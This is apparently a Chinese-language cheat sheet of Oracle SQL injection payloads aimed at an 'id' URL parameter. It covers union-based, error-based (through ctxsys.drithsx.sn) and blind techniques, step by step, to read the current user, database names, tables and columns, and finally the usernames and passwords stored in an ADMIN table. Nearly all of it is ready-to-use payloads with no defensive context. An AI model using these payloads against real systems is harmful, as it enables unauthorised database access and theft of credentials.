Oracle 注入

判断注入

id=1 and 1=1--
id=1 and 1=2--
通过<>(不等于)
id=1 and 1<>2--
id=1 and 1<>1--

联合查询

判断列数
id=1 order by 4--

空位用null填充，得到回显位

id=-1 union select null, null, null, null from dual --
id=-1 union select null, to_nchar('aaa'), to_nchar('bbb'), null from dual --

查当前用户
id=-1 union select null, to_nchar(user), null, null from dual --

查询当前表
id=-1 union select null, to_nchar(table_name), null, null from user_tables --

查询第二个表

查询字段

查询ADMIN表的第一个字段 UNAME
id=-1 union select null, to_nchar(column_name), to_nchar('bbbbb'), null from user_tab_columns where table_name='ADMIN'--

查询ADMIN表的第二个字段 UPASS
id=-1 union select null, to_nchar(column_name), to_nchar('bbbbb'), null from user_tab_columns where table_name='ADMIN' and column_name<>'UNAME'--

查数据
id=-1 union select null, to_nchar(UNAME), to_nchar(UPASS), null from ADMIN

遍历数据 rownum分页

报错注入

查看当前用户
id=1 and 1=ctxsys.drithsx.sn(1,(select user from dual)) --

查询当前库
id=1 and 1=ctxsys.drithsx.sn(1,(SELECT SYS.DATABASE_NAME FROM DUAL)) --

查询其他库 替换ro的数字1,2,3…
id=1 and 1=ctxsys.drithsx.sn(1,(select SYS.DATABASE_NAME from (SELECT rownum ro, SYS.DATABASE_NAME FROM DUAL) where ro=1 )) --

查询表名
id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from (SELECT rownum ro,table_name FROM user_tables) where ro=3)) --
查询第二个表名
id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN'))
id=1 and 1=ctxsys.drithsx.sn(1,(select table_name from user_tables where rownum=1 and table_name<>'ADMIN' and table_name<>'NEWS' ))

查询当前表的第一个字段UNAME
id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from (SELECT rownum ro,column_name FROM user_tab_columns) where ro=1))--

id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1))--

id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from user_tab_columns where rownum=1 and column_name<>'UNAME'))--

查询当前表的第二个字段UPASS
id=1 and 1=ctxsys.drithsx.sn(1,(select column_name from (SELECT rownum ro,column_name FROM user_tab_columns) where ro=2))--

查数据
id=1 and 1=ctxsys.drithsx.sn(1,(select UPASS from (SELECT rownum ro, UPASS FROM ADMIN) where ro=1))--

盲注

猜解当前用户的长度
id=1 and 6=(select length(user) from dual)–

猜解当前用户的第一位
id=1 and (select ascii(substr(user,1,1)) from dual)=49

猜解当前用户的第二位
id=1 and (select ascii(substr(user,2,1)) from dual)=87

decode(字段或字段的运算，值1，值2，值3）
这个函数运行的结果是，当字段或字段的运算的值等于值1时，该函数返回值2，否则返回3
判断当前用户是否为ORACLE1
id=1 and 1=(select decode(user, ‘ORACLE1’,1,0) from dual)–

逐字猜解 第一位O
id=1 and 1=(select decode(substr(user,1,1),‘O’,1,0) from dual) –
逐字猜解 第二位O
id=1 and 1=(select decode(substr(user,2,1),‘R’,1,0) from dual) –

查当前用户第一个decode ascii|chr
and 1=(select decode(substr((select user from dual),1,1), ‘O’, 1, 0) from dual)–
select decode(substr((select user from dual),1,1), chr(83), 1, 0) value from dual;
select decode(ascii(substr((select user from dual),1,1)), ‘83’, 1, 0) value from dual;
and 1=(instr((select user from dual),‘o’)) –

case when instr
查询当前用户的第一个字段是否为S 是返回1否返回0
select decode((instr(user, chr(83), 1, 1)), 1, 1, 0) value from dual;
查询当前用户的第二个字段是否为Y
select decode((instr(user, chr(89), 2, 1)), 2, 1, 0) value from dual;
查询当前用户的第一个字段是否为S 是返回1否返回0
select case instr(user, chr(83), 1, 1) when 1 then 1 else 0 end value from dual;
id=1 and 1=(case instr(user, chr(79), 1, 1) when 1 then 1 else 0 end)–

lrpad | rpad
查询当前用户的第一个字段是否为S 是返回1否返回0
select decode(‘S’, rpad(user, 1,1), 1, 0) value from dual;
select decode(‘SYSTEM’, rpad(user, 6,1), 1, 0) value from dual;